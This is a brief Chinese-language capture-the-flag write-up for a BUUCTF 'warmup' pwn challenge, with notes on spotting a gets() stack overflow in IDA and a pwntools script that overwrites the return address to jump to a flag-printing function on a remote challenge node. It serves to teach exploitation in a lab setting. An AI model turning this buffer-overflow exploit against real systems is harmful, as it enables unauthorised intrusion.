1.checksec+运行
64位/没有保护
2.64位IDA进行
1.main 函数
明显的溢出函数gets()
跟进v5看看
offset = 0x40+8
shift+f12
真不错,cat flag.txt
找它的地址
3.上脚本
from pwn import*
#p=process('./3warmup')
p=remote("node4.buuoj.cn",28180)
flag_addr=0x400611
payload=b'a'*(0x40+8)+p64(flag_addr)
p.sendline(payload)
p.interactive()